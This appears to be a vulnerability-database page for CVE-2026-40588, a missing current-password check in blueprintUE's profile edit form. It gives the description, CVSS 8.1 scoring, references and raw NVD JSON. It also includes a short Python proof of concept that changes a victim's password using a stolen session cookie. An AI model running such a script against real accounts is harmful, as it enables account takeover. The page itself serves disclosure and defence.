CVE-2026-40588

Description

blueprintUE is a tool to help Unreal Engine developers. Prior to 4.2.0, the password change form at /profile/{slug}/edit/ does not include a current_password field and does not verify the user's existing password before accepting a new one. Any attacker who obtains a valid authenticated session — through XSS exploitation, session sidejacking over HTTP, physical access to a logged-in browser, or a stolen "remember me" cookie — can immediately change the account password without knowing the original credential, resulting in permanent account takeover. This vulnerability is fixed in 4.2.0.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

blueprintUE < 4.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-40588
# Exploit: Change password without knowing the current one using a valid session.
import requests

target_url = "http://target.com/profile/{user_slug}/edit/"
stolen_session_cookie = "victim_session_id_here"

headers = {
    "Cookie": f"sessionid={stolen_session_cookie}"
}

data = {
    "new_password": "NewHackedPassword123!",
    "confirm_password": "NewHackedPassword123!"
    # Note: 'current_password' field is missing or ignored
}

response = requests.post(target_url, headers=headers, data=data)

if response.status_code == 200:
    print("[+] Password changed successfully!")
else:
    print("[-] Failed to change password.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40588
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40588
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40588/
[4] VulDB https://vuldb.com/cve/CVE-2026-40588
[5] https://github.com/blueprintue/blueprintue-self-hosted-edition/security/advisories/GHSA-73f2-p9jr-m44x
[6] https://github.com/blueprintue/blueprintue-self-hosted-edition/security/advisories/GHSA-73f2-p9jr-m44x

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40588", "sourceIdentifier": "[email protected]", "published": "2026-04-21T18:16:51.207", "lastModified": "2026-04-22T21:16:27.863", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "blueprintUE is a tool to help Unreal Engine developers. Prior to 4.2.0, the password change form at /profile/{slug}/edit/ does not include a current_password field and does not verify the user's existing password before accepting a new one. Any attacker who obtains a valid authenticated session — through XSS exploitation, session sidejacking over HTTP, physical access to a logged-in browser, or a stolen \"remember me\" cookie — can immediately change the account password without knowing the original credential, resulting in permanent account takeover. This vulnerability is fixed in 4.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-620"}]}], "references": [{"url": "https://github.com/blueprintue/blueprintue-self-hosted-edition/security/advisories/GHSA-73f2-p9jr-m44x", "source": "[email protected]"}, {"url": "https://github.com/blueprintue/blueprintue-self-hosted-edition/security/advisories/GHSA-73f2-p9jr-m44x", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}